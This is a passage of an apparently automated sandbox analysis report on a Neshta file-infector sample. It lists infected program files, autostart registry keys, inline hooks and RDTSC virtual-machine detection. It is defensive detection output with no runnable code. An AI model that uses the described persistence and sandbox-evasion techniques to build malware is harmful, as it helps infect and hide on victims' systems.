          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
          Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Windows\svchost.comJump to dropped file

          Boot Survival:

          barindex
          Yara detected NeshtaShow sources
          Source: Yara matchFile source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara matchFile source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
          Creates an undocumented autostart registry key Show sources
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gmsauhJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run gmsauhJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000023598E4 second address: 00000000023598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000002359B4E second address: 0000000002359B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000000E798E4 second address: 0000000000E798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000000E79B4E second address: 0000000000E79B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
